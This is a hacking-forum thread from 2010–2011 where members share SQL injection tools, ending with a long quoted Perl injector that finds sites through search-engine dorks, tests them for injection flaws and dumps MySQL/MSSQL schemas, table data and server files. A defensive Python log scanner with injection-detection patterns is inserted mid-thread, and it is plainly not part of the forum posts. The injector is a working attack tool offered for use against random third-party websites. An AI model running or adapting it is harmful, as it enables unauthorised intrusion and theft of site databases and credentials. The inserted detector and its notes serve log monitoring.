IT Security Team  
Thread: SQL Injection topics (forum section: Web Application vulnerability articles, tools and videos)
Post #21, 07-24-2010, 06:50 AM
dmayor64 (New member; joined Jul 2010; 2 posts)

I want to know how to scan for admin and password
Post #22, 08-12-2010, 10:21 PM
uones (New member; joined Sep 2009; 11 posts)

Hello friends, here is the ExploitScanner program, which works great. You give it a dork, it scans, and after it has scanned we hit Test (depending on the dork and the vulnerability checkbox you select); it shows us the sites that have the bug, and then we inject.
Attached images
File type: jpg Untitled-1.jpg (93.2 KB, 90 views)
Attached files
File type: rar ExploitScanner.rar (76.1 KB, 290 views)
Post #23, 12-04-2010, 12:23 PM
firemaker (Section moderator; joined Mar 2010; 291 posts)
Subject: SQLInject Finder tools

Hello,

SQLInject Finder is a tool for finding injection, written in Python. As input it takes a .pcap file (the file format Wireshark uses) and, among the requests it contains, tries to identify the problematic paths. It is run with the command below, and the output is written to the file capture.tsv:

python sqlinject-finder.py -f capture.pcap -t > capture.tsv


Link:
[only site members can see links]

Thanks
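The tools in this thread (the pcap-based SQLInject Finder in this post, and the Perl injector quoted further down) all work from the same observable: the request targets carry payloads such as "0+order+by+9999999--", "0+union+select+...", reads from information_schema, MySQL load_file() and MSSQL convert(int,...) casts, sometimes with "/**/" or "%20" in place of spaces. The script below is an added example, written for this page and not taken from the forum or from any tool it links, showing how a defender can flag the same payloads in ordinary web server access logs. The log lines are constructed for the example, and the signature list is an assumption drawn only from the payloads visible in this thread, not a complete SQLi ruleset.

```python
#!/usr/bin/env python3
"""Flag SQL-injection probes in web server access logs (constructed example)."""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Apache/nginx "combined" format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Signatures derived from the probing payloads visible in this thread's injector
# script (assumption: an illustrative list, not a complete SQLi ruleset).
SIGNATURES = {
    "order-by probe":      re.compile(r"\border\s+by\s+\d{4,}", re.I),
    "union select":        re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "information_schema":  re.compile(r"\binformation_schema\.", re.I),
    "load_file":           re.compile(r"\bload_file\s*\(", re.I),
    "mssql int cast":      re.compile(r"\bconvert\s*\(\s*int\s*,", re.I),
    "mssql version probe": re.compile(r"@@(version|servername)\b", re.I),
    "mysql version probe": re.compile(r"\bversion\s*\(\s*\)", re.I),
}


def normalize(target):
    """Undo the encodings the injector uses so the SQL reads as the database would see it."""
    text = unquote_plus(target)             # %xx escapes and '+' -> space
    text = unquote_plus(text)               # a second pass catches double encoding
    text = re.sub(r"/\*.*?\*/", " ", text)  # '/**/' inline comments used in place of spaces
    text = text.replace("\x00", " ")        # '%00' used as a statement terminator
    return re.sub(r"\s+", " ", text)


def classify(target):
    """Return the names of every signature the normalised request target matches."""
    text = normalize(target)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]


def scan_log(lines):
    """Parse combined-format lines; return one finding per request that matches a signature."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:                           # skip lines that are not in the expected format
            continue
        hits = classify(m["target"])
        if hits:
            findings.append({
                "ip": m["ip"],
                "time": m["time"],
                "status": int(m["status"]),
                "target": m["target"],
                "matches": hits,
            })
    return findings


def probing_sources(findings, threshold=2):
    """Source addresses with at least `threshold` flagged requests: likely automated scanning."""
    counts = Counter(f["ip"] for f in findings)
    return {ip: n for ip, n in counts.items() if n >= threshold}


# Constructed log lines: two MySQL probes from one address, one MSSQL probe,
# and two benign requests (one of them contains a harmless "order by").
SAMPLE_LOG = [
    '203.0.113.7 - - [24/Jul/2010:06:50:01 +0000] "GET /page.php?id=10+order+by+9999999-- HTTP/1.1" 500 512 "-" "FAST-WebCrawler/3.3"',
    '203.0.113.7 - - [24/Jul/2010:06:50:02 +0000] "GET /page.php?id=0/**/union/**/select/**/1,2,concat(0x617a,version()),3/**/from/**/information_schema.columns-- HTTP/1.1" 200 2048 "-" "FAST-WebCrawler/3.3"',
    '198.51.100.23 - - [24/Jul/2010:07:12:40 +0000] "GET /news.asp?id=5%20and%201=convert(int,(select%20@@version))-- HTTP/1.1" 500 611 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [24/Jul/2010:07:13:05 +0000] "GET /page.php?id=12 HTTP/1.1" 200 3381 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [24/Jul/2010:07:13:09 +0000] "GET /shop.php?sort=order+by+price HTTP/1.1" 200 2970 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for f in results:
        print(f'{f["ip"]} {f["status"]} {f["target"]} -> {", ".join(f["matches"])}')
    print("probing sources:", probing_sources(results))
```

Two points worth noting from the design. The normalisation step matters more than the signature list: the injector in this thread deliberately swaps spaces for "/**/" or "%20" and terminates with "%00", so matching on the raw log line would miss exactly the requests it sends. And the 500 status on the first and third sample lines is the other half of the story: the scanner quoted below decides a site is vulnerable purely from leaked error strings such as "You have an error in your SQL syntax", so an application that uses parameterised queries and returns a generic error page gives that scanner nothing to key on.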
Post #24, 12-22-2010, 07:21 PM
Dork (New member; joined Sep 2009; location: bash/; 212 posts)
Subject: ExploitMyUnion v2.1

Hello...

A powerful tool for doing Union:

The ExploitMyUnion v2.1 release, which is provided on sourceforge.net.
Attached files
File type: zip exploitmyunion-2.1_win32.zip (8.88 MB, 183 views)
Post #25, 05-17-2011, 12:43 PM
firemaker (Section moderator; joined Mar 2010; 291 posts)
Subject: Safe3si v.8.1, a tool for SQL Injection

Hello,

Safe3si is a tool that can be used for SQL Injection; friends who want to download it can go to the link below (though I should say its power does not reach Havij's).

[only site members can see links]


Thanks
Post #26, 07-16-2011, 07:30 AM
jospyro (New member; joined May 2011; location: indonesia; 27 posts)

Quote:
Originally Posted by 777
An injector in Perl, both for SQLi and for MySQLi

Code:
#!/usr/bin/perl
#
# OOO  OOO           OO    OO        OO
#  OO   O             O     O         O
#  O O  O  OO  OO     O     O        O O   OO OOO   OOOO    OOOOO
#  O  O O   O   O     O     O        OOO    OO     OOOOOO       O
#  O   OO   O   O     O     O       O   O   O      O       OOOOOO
# OOO  OO   OOOOO   OOOOO OOOOO    OOO OOO OOOOO    OOOOO  OOOO OO
################################################################################################################################
#                                             SQL INJECTOR 
################################################################################################################################

#proxy support
#URl Extractor + vuln scanner & checker



use LWP::UserAgent;
use HTTP::Request;

sub help
{
     system('cls');
     system('title SQL InJeCtoR v2.0');
     print "\n\n-----------------------------------\n";
     print "[!] Usage : perl $0 <option>\n";
     print "\n\n--/// MySQL\n";
     print "     --mysqlcol         MySQL column length calculator            MySQL v4/5\n";
     print "     --mysqldetails     MySQL target website db global infos      MySQL v4/5\n";
     print "     --mysqlschema      MySQL Full Schema Extractor               MySQL v5\n";
     print "     --mysqldump        MySQL Data Dump                           MySQL v4/5\n";
     print "     --mysqlfile        MySQL load_file fuzzer                    MySQL v4/5\n";
     print "     --mysqltblfuzz     MySQL Table_name Fuzzer                   MySQL v4\n";
     print "     --mysqlcolfuzz     MySQL Column_name Fuzzer                  MySQL v4\n";
	 print "\n\n--/// MsSQL\n";
	 print "     --mssqldetails      MsSQL DB global info\n";
	 print "     --mssqltable        MsSQL Tables Extractor\n";
	 print "     --mssqlcolumns      MsSQL Columns Extractor\n";
	 print "     --mssqldump         MsSQL Columns Extractor\n";
	 print "\n\n--/// Vulunerability Scanner\n";
	 print "     --dork              URL Extractor , SQL Vulnerability's Scanner & checker\n";
	 print "\n\n--/// Options\n";
	 print "     --proxy             define a proxy to use\n";
	 print "     --listfile          list of columns or tables to use in fuzz or load_file files list\n";
	 print "     --output            save injection or scan result in an outside file\n";
	 print "     --table             table to use in dumping data or in tbles extract\n";
	 print "     --column            column to use in dumping data or in column extract\n";
	 print "     --help              print this help text :P\n";
     exit();
}

sub variables
{
     my $i=0;
     foreach (@ARGV)
     {
         if ($ARGV[$i] eq "--dork"){$search_dork = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqlcol"){$mysql_count_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqldetails"){$mysql_details_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqlschema"){$mysql_schema_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqldump"){$mysql_dump_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqltblfuzz"){$mysql_fuzz_table = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqlcolfuzz"){$mysql_fuzz_column = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqlfile"){$mysql_load_file = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mssqldetails"){$mssql_details_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mssqltable"){$mssql_table_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mssqlcolumn"){$mssql_column_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mssqldump"){$mssql_dump_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--column"){$sql_dump_column = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--table"){$sql_dump_table = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--evasion"){$evasion = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--output"){$vulnfile = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--proxy"){$proxy = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--listfile"){$word_list = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--help"){&help}
         $i++;
     }
}

sub main
{
     system('cls');
     system('title SQL InJeCtoR');
	 if (@ARGV<1){print "[!] For Help : perl $0 --help\n\n\n" ;}
}

sub vulnscanner
{
     checkgoogle();
     googlescan($search_dork);
     askscan($search_dork);
}

sub checkgoogle
{
	 my $request   = HTTP::Request->new(GET => "http://www.google.com/search?hl=en&q=$search_dork&btnG=Search&start=10");
     my $useragent = LWP::UserAgent->new(agent => 'FAST-WebCrawler/3.3');
     $useragent->proxy("http", "http://$proxy/") if defined($proxy);
     my $response  = $useragent->request($request) ;
     my $result    = $response->content;
	 if ($result   =~ m/if you suspect that your computer or network has been infected/i){print "[!] You Have Been Banned From Google Search :( \n";exit()}
}		 

sub googlescan
{
     my $dork  = $_[0];
     for ($i=0;$i<200;$i=$i+10)
     {
         my $request   = HTTP::Request->new(GET => "http://www.google.com/search?hl=en&q=$dork&btnG=Search&start=$i");
         my $useragent = LWP::UserAgent->new(agent => 'FAST-WebCrawler/3.3');
	     $useragent->proxy("http", "http://$proxy/") if defined($proxy);
         my $response  = $useragent->request($request) ;
         my $result    = $response->content;
         while ($result =~ m/class=r><a href=\"(.*?)\" class=l>/g )
		 {
		     print "[!] Trying to fuzz $1\n";	 
		     checkvuln($1)
		 }
     }				  
}

sub askscan
{
     my $dork  = $_[0];
     for ($i=0;$i<20;$i++)
     {
         my $request   = HTTP::Request->new(GET => "http://www.ask.com/web?q=page.php?id=&qsrc=0&o=0&l=dir&q=$dork&page=$i&jss=");
         my $useragent = LWP::UserAgent->new(agent => 'FAST-WebCrawler/3.3');
		 $useragent->proxy("http", "http://$proxy/") if defined($proxy);
         my $response  = $useragent->request($request) ;
         my $result    = $response->content;
         while ($result =~ m/<span id=\"r(.*)_u\" class=\"(.*)\">(.*)<\/span>/gi)
		 {
			 my $askurl ="http://".$3 ;
			 print "[!] Trying to fuzz $askurl\n";
			 checkvuln($askurl);
		 }
	 }
}

sub checkvuln
{
     my $scan_url   = $_[0];
     my $link       = $scan_url.'0+order+by+9999999--';
	 my $ua         = LWP::UserAgent->new();
	 $ua->proxy("http", "http://$proxy/") if defined($proxy);
     my $req        = $ua->get($link);
	 my $fuzz       = $req->content;
	 if ($fuzz =~ m/You have an error in your SQL syntax/i || $fuzz =~ m/Query failed/i || $fuzz =~ m/SQL query failed/i || $fuzz =~ m/mysql_fetch_/i || $fuzz =~ m/mysql_fetch_array/i || $fuzz =~ m/mysql_num_rows/i || $fuzz =~ m/The used SELECT statements have a different number of columns/i )
	 {
	     print "[!] MySQL Vulnerable     -> $scan_url\n";
		 if (defined($vulnfile))
         { 
		     push (@mysqlvuln,"$scan_url\n");
		 }
	 }
	 elsif ($fuzz =~ m/ODBC SQL Server Driver/i)
	 {
	     print "[!] MsSQL Vulnerable     -> $scan_url\n";
		 if (defined($vulnfile))
         { 
		     push (@mssqlvuln,"$scan_url\n");
		 }
	 }
	 elsif ($fuzz =~ m/Microsoft JET Database/i || $fuzz =~ m/ODBC Microsoft Access Driver/i )
	 {
	     print "[!] MS Access Vulnerable -> $scan_url\n";
		 if (defined($vulnfile))
         { 
		     push (@accessvuln,"$scan_url\n");
		 }
	 }
}

sub mysqlcount
{
     my $site   = $_[0];
     my $ev     = $_[1];
     my $null   = "09+and+1=" ;
     my $code   = "0+union+select+" ;
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
     my $injection = $site.$null.$code."0",$com ;
     my $useragent = LWP::UserAgent->new();
	 $useragent->proxy("http", "http://$proxy/") if defined($proxy);
     my $response  = $useragent->get($injection);
     my $result   = $response->content;
     if( $result =~ m/You have an error in your SQL syntax/i || $result =~ m/Query failed/i || $result =~ m/SQL query failed/i || $result =~ m/mysql_fetch_/i || $result =~ m/mysql_fetch_array/i || $result =~ m/mysql_num_rows/i || $result =~ m/The used SELECT statements have a different number of columns/i )
     {
          print "\n[!] This Website Is Vulnerable\n" ;
	      print "[+] Working On It\n";
     }
     else
     {
         print "\n[!] This WebSite Is Not SQL Vulnerable !\n";
         exit();
     }
     for ($i = 0 ; $i < 100 ; $i ++)
     {
	     $col.=','.$i;
	     $specialword.=','."0x617a38387069783030713938";
         if ($i == 0)
         {
             $specialword = '' ; 
             $col = '' ;
         }
         $sql=$site.$null.$code."0x617a38387069783030713938".$specialword.$com ;
	     $ua = LWP::UserAgent->new();
		 $ua->proxy("http", "http://$proxy/") if defined($proxy);
	     $rq = $ua->get($sql);
		 $response = $rq->content;
	     if($response =~ /az88pix00q98/)
         {
             $i ++;			 
             print "\n[!] MySQL Column Count Finished\n" ;
             print "[!] This WebSite Have $i Columns\n" ;
             $sql=$site.$null.$code."0".$col.$com ;
		     print "=> ".$sql ."\n\n";	
			 if (defined($vulnfile))
			 {
			     open(vuln_file,">>$vulnfile") ;
                 print vuln_file "Target Host : $site\n";
                 print vuln_file "Evasion     : $ev\n";
                 print vuln_file "Col length  : $i\n";
                 print vuln_file "Injection   : $sql\n";
                 close(vuln_file);
                 print "[+] Result Saved to $vulnfile\n";
			 }
             exit () ;		 
         }	
     }
}

sub mysqldetails
{
     my $site   = $_[0];
     my $ev     = $_[1];
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
     my $selection = "concat(0x617a38387069783030713938,version(),0x617a38387069783030713938,database(),0x617a38387069783030713938,user(),0x617a38387069783030713938)";
     print "\n[+] Info Getting, Started Please Wait ....\n\n";
	 if ($site =~ /(.*)NullArea(.*)/i)
     {
         my $newlink = $1.$selection.$2.$com;
         my $ua = LWP::UserAgent->new();
		 $ua->proxy("http", "http://$proxy/") if defined($proxy);
	     my $request = $ua->get($newlink);
	     my $content = $request->content;
         if ($content =~ /az88pix00q98(.*)az88pix00q98(.*)az88pix00q98(.*)az88pix00q98/)
         {
	         print "[!] Database Version  : $1\n";
             print "[!] Database Name     : $2\n";						  
             print "[!] DB UserName       : $3\n";						  
			 if (defined($vulnfile))
			 {
			     open(vuln_file,">>$vulnfile") ;
                 print vuln_file "[!] Target            : $site\n";
                 print vuln_file "[!] evasion           : $ev\n";
                 print vuln_file "[!] Database Version  : $1\n";
                 print vuln_file "[!] Database Name     : $2\n";
                 print vuln_file "[!] DB UserName       : $3\n";
                 close(vuln_file);
                 print "\n[+] Result Saved to $vulnfile\n";
			 }
             exit () ;			 
		 }
		 else
		 {
		     print "[!] Failed\n";
			 exit () ;	
		 }
	 }
	 else 
	 {
	     print "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
         exit () ;			 
	 }
}

sub mysqlschema
{
     my $site   = $_[0];
     my $ev     = $_[1];
	 my @schema=();
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
     my $selection = "concat(0x617a38387069783030713938,column_name,0x617a38387069783030713938,table_name,0x617a38387069783030713938,table_schema,0x617a38387069783030713938)";
     print "\n[+] Schema Extracting, Started Please Wait ....\n\n";
	 if ($site =~ /(.*)NullArea(.*)/i)
     {
		 print "[+] Column :|: Table :|: Database\n"; 
         for ($i=0;  $i<=1500 ; $i++ )
         {
	         $newstring = $1.$selection.$2.$add.'from'.$add.'information_schema.columns'.$add.'LIMIT'.$add.$i.','.'1'.$com;
             my $ua = LWP::UserAgent->new();
			 $ua->proxy("http", "http://$proxy/") if defined($proxy);
	         my $request = $ua->get($newstring);
	         my $content = $request->content;
             if ($content =~ /az88pix00q98(.*)az88pix00q98(.*)az88pix00q98(.*)az88pix00q98/)
             { 
				 print "[!] $1 :|: $2 :|: $3 \n";
				 push (@schema,"$1 :|: $2 :|: $3 \n");
		     }
	     }
		 if (defined($vulnfile))
		 {
		     open(vuln_file,">>$vulnfile") ;
             print vuln_file "[!] Target            : $site\n";
             print vuln_file "[!] evasion           : $ev\n";
             print vuln_file "[!] Schema  :: ----     \n\n\n";
		     $i=0;
		     foreach(@schema)
		     {
                 print vuln_file $schema[$i]."\n";
			     $i++;
		     }
             print "\n[+] Result Saved to $vulnfile\n";
		 }
	 }
	 else 
	 {
	     print "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
         exit () ;			 
	 }
}

sub mysqldump
{
     my $site   = $_[0];
     my $colm   = $_[1];
     my $tble   = $_[2];
     my $ev     = $_[3];
	 print "[+] Table name $tble\n";
	 print "[+] Column name $colm\n";
	 my @dumper=();
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
     my $selection = "concat(0x617a38387069783030713938,$colm,0x617a38387069783030713938)";
     print "\n[+] Data Dump Started Please Wait ....\n\n";
	 if ($site =~ /(.*)NullArea(.*)/i)
     {
	     $i=0;
		 print "[+] Dumped Data : //// \n"; 
         do
         {
	         $newstring = $1.$selection.$2.$add.'from'.$add.$tble.$add.'LIMIT'.$add.$i.','.'1'.$com;			 
             my $ua = LWP::UserAgent->new();
			 $ua->proxy("http", "http://$proxy/") if defined($proxy);
	         my $request = $ua->get($newstring);
	         my $content = $request->content;
             if ($content =~ /az88pix00q98(.*)az88pix00q98/)
             { 
				 print "[!] $1 \n";
                 push(@dumper,"$1\n");
		     }
			 $i++;
	     }
		 while ($i<1500);
		 if (defined($vulnfile))
	     {
		     open(vuln_file,">>$vulnfile") ;
             print vuln_file "[!] Target            : $site\n";
             print vuln_file "[!] evasion           : $ev\n";
             print vuln_file "[!] Dumped Column     : $colm\n";
             print vuln_file "[!] Dumped Table      : $tble\n";
             print vuln_file "[!] Data  :: ----     \n\n\n";
		     $i=0;
		     foreach(@dumper)
		     {
                 print vuln_file $dumper[$i]."\n";
			     $i++;
		     }
             close(vuln_file);
             print "\n[+] Result Saved to $vulnfile\n";
		 }
	 }
	 else 
	 {
	     print "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
         exit () ;			 
	 }
}

sub mysqlfuzztable
{
     my $site    = $_[0];
     my $ev      = $_[1];
     my $filelst = $_[2];
	 print "[+] File List $filelst\n";
	 my @tbles_possible=();
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
	 open (word_list_file,"$filelst") or die "[!] Couldnt Open WordList File $!\n";
	 @word_list_search = <word_list_file> ;
     print "\n[+] Fuzzing Table, Started Please Wait ....\n\n";
	 if ($site =~ /(.*)NullArea(.*)/i)
     {
		 print "[+] Fuzz Result : //// \n\n";
         $i=0;		 
         foreach (@word_list_search)
         {
		     print "[!] Trying To Fuzz Table_name with $word_list_search[$i]";
	         $newstring = $1."0x617a38387069783030713938".$2.$add.'from'.$add.$word_list_search[$i].$com;				 
             my $ua = LWP::UserAgent->new();
			 $ua->proxy("http", "http://$proxy/") if defined($proxy);
	         my $request = $ua->get($newstring);
	         my $content = $request->content;
             if ($content =~ /az88pix00q98/)
             { 
				 print "\n[!] Found Table ! $word_list_search[$i] \n";
                 push(@tbles_possible,"$word_list_search[$i]\n");
		     }
			 $i++;
	     }
		 if (defined($vulnfile))
	     {
		     open(vuln_file,">>$vulnfile") ;
             print vuln_file "[!] Target            : $site\n";
             print vuln_file "[!] evasion           : $ev\n";
             print vuln_file "[!] Wordlist          : $filelst\n";
             print vuln_file "[!] Tbles Found  :: ----     \n\n\n";
		     $i=0;
		     foreach(@tbles_possible)
		     {
                 print vuln_file $tbles_possible[$i]."\n";
			     $i++;
		     }
             close(vuln_file);
             print "\n[+] Result Saved to $vulnfile\n";
		 }
	 }
	 else 
	 {
	     print "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
         exit () ;			 
	 }
}

sub mysqlfuzzcolumn
{
     my $site    = $_[0];
     my $ev      = $_[1];
     my $filelst = $_[2];
	 my $tablext = $_[3];
	 print "[+] File List $filelst\n";
	 print "[+] Table To Fuzz Columns $tablext\n";
	 my @cols_possible=();
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
	 open (word_list_file,"$filelst") or die "[!] Couldnt Open WordList File $!\n";
	 @word_list_search = <word_list_file> ;
     print "\n[+] Fuzzing Column, Started Please Wait ....\n\n";
	 if ($site =~ /(.*)NullArea(.*)/i)
     {
		 print "[+] Fuzz Result : //// \n\n";
         $i=0;		 
         foreach (@word_list_search)
         {
		     print "[!] Trying To Fuzz Column_name with $word_list_search[$i]";
	         $newstring = $1."concat(0x617a38387069783030713938,$word_list_search[$i])".$2.$add.'from'.$add.$tablext.$com;				 
             my $ua = LWP::UserAgent->new();
			 $ua->proxy("http", "http://$proxy/") if defined($proxy);
	         my $request = $ua->get($newstring);
	         my $content = $request->content;
             if ($content =~ /az88pix00q98/)
             { 
				 print "\n[!] File Column ! $word_list_search[$i] \n";
                 push(@cols_possible,"$word_list_search[$i]\n");
		     }
			 $i++;
	     }
		 if (defined($vulnfile))
	     {
		     open(vuln_file,">>$vulnfile") ;
             print vuln_file "[!] Target            : $site\n";
             print vuln_file "[!] evasion           : $ev\n";
             print vuln_file "[!] Wordlist          : $filelst\n";
             print vuln_file "[!] Cols Found  :: ----     \n\n\n";
		     $i=0;
		     foreach(@cols_possible)
		     {
                 print vuln_file $cols_possible[$i]."\n";
			     $i++;
		     }
             close(vuln_file);
             print "\n[+] Result Saved to $vulnfile\n";
		 }
	 }
	 else 
	 {
	     print "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
         exit () ;			 
	 }
}

sub mysqlfile
{
     my $site    = $_[0];
     my $ev      = $_[1];
     my $filelst = $_[2];
	 print "[+] File List $filelst\n";
	 my @cols_possible=();
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
	 open (word_list_file,"$filelst") or die "[!] Couldnt Open WordList File $!\n";
	 @word_list_search = <word_list_file> ;
     print "\n[+] File Fuzz, Started Please Wait ....\n\n";
	 if ($site =~ /(.*)NullArea(.*)/i)
     {
		 print "[+] Fuzz Result : //// \n\n";
         $i=0;		 
         foreach (@word_list_search)
         {
	         $newstring = $1."concat(0x617a38387069783030713938,load_file('$word_list_search[$i]'))".$2.$com;			 
             my $ua = LWP::UserAgent->new();
			 $ua->proxy("http", "http://$proxy/") if defined($proxy);
	         my $request = $ua->get($newstring);
	         my $content = $request->content;
			 print "[!] Trying To Fuzz Load_File with $word_list_search[$i]";
             if ($content =~ m/az88pix00q/i)
             { 
				 print "\n[!] Found File ! $word_list_search[$i] \n";
                 push(@cols_possible,"$word_list_search[$i]\n");
		     }
			 $i++;
	     }
		 if (defined($vulnfile))
	     {
		     open(vuln_file,">>$vulnfile") ;
             print vuln_file "[!] Target            : $site\n";
             print vuln_file "[!] evasion           : $ev\n";
             print vuln_file "[!] Wordlist          : $filelst\n";
             print vuln_file "[!] Files Found  :: ----     \n\n\n";
		     $i=0;
		     foreach(@cols_possible)
		     {
                 print vuln_file $cols_possible[$i]."\n";
			     $i++;
		     }
             close(vuln_file);
             print "\n[+] Result Saved to $vulnfile\n";
		 }
	 }
	 else 
	 {
	     print "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
         exit () ;			 
	 }
}

sub mssqldetails
{
     my $site   = $_[0];
     my $ev     = $_[1];
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
	 print "\n[+] Getting Infos, Started Please Wait ....\n\n";
     $version = "convert(int,(select".$add."\@\@version));--" ;
     $system_user = 'convert(int,(select'.$add.'system_user));--';
     $db_name = 'convert(int,(select'.$add.'db_name()));--';
     $servername = 'convert(int,(select'.$add.'@@servername));--' ;
     my $injection = $site.$version ;
     my $request   = HTTP::Request->new(GET=>$injection);
     my $useragent = LWP::UserAgent->new();
     $useragent->timeout(10);
     my $response  = $useragent->request($request)->as_string ;
     if ($response =~ /.*?value\s'/)
	 {
	     print "[+] This Website Is SQL Vulnerable ..\n";
	     print "[+] Working On It ..\n";
         $ver = $1 if ($response =~ /.*?value\s'(.*?)'\sto.*/sm) ;
	     print "\n[!] MsSQL Version Is :";
	     print "\n\n => $ver"	;
	     my $injection = $site.$system_user ;
         my $request   = HTTP::Request->new(GET=>$injection);
         my $useragent = LWP::UserAgent->new();
         $useragent->timeout(10);
         my $response  = $useragent->request($request)->as_string ;
	     $system_user = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
         print "\n[!] MsSQL System_User Is    :";
	     print "  $system_user  "	;
         my $injection = $site.$db_name ;
         my $request   = HTTP::Request->new(GET=>$injection);
         my $useragent = LWP::UserAgent->new();
         $useragent->timeout(10);
         my $response  = $useragent->request($request)->as_string ;
	     $db_name = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
         print "\n[!] MsSQL Database Name Is  :";
	     print "  $db_name  "	;		  
	     my $injection = $site.$servername ;
         my $request   = HTTP::Request->new(GET=>$injection);
         my $useragent = LWP::UserAgent->new();
         $useragent->timeout(10);
         my $response  = $useragent->request($request)->as_string ;
	     $servername = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
         print "\n[!] MsSQL Server Name Is    :";
	     print "  $servername  "	;	
         exit ();					   
	 }
	 else 
	 {
	     system ("cls");
	     print "\n[!] This Website Is Not SQL Vulnerable !";
	     exit();
	}
}

sub mssqltable
{
     my $site   = $_[0];
     my $ev     = $_[1];
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
	 print "\n[+] Table Extracting, Started Please Wait ....\n\n";
     $table = "convert(int,(select".$add."top".$add."1".$add."table_name".$add."from".$add."information_schema.tables));--";
     $data = "'Ws65qd798sqd9878'";
	 print "[!] Tables : //// \n\n"; 
     for ($i;$i<1500;$i++)
     {
         my $injection = $site.$table ;
         my $useragent = LWP::UserAgent->new();
		 $ua->proxy("http", "http://$proxy/") if defined($proxy);
         my $request   = $useragent->get($injection);
         my $response  = $request->content;
         if ($response =~ /.*?value\s'(.*?)'\sto.*/sm)
         {
	         print "[+] ".$1."\n";
			 push (@exttbles,$1);
	         $start = "(";
	         $data .= ",'$1'";
	         $end   = ")";
	         $total = $start.$data.$end;
	         $table = "convert(int,(select".$add."top".$add."1".$add."table_name".$add."from".$add."information_schema.tables".$add."where".$add."table_name".$add."not".$add."in".$add."$total));--";	
         }
     }
	 if (defined($vulnfile))
     {
		 open(vuln_file,">>$vulnfile") ;
         print vuln_file "[!] Target            : $site\n";
         print vuln_file "[!] evasion           : $ev\n";
         print vuln_file "[!] Data  :: ----     \n\n\n";
		 $i=0;
		 foreach(@exttbles)
		 {
             print vuln_file $exttbles[$i]."\n";
			 $i++;
		 }
         close(vuln_file);
         print "\n[+] Result Saved to $vulnfile\n";
	 }
}

sub mssqlcolumn
{
     my $site   = $_[0];
     my $ev     = $_[1];
	 my $tblextrct = $_[2];
	 print "[+] Table To Extract From $tblextrct\n";
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
	 print "\n[+] Table Extracting, Started Please Wait ....\n\n";
	 $data = "'Ws65qd798sqd9878'";
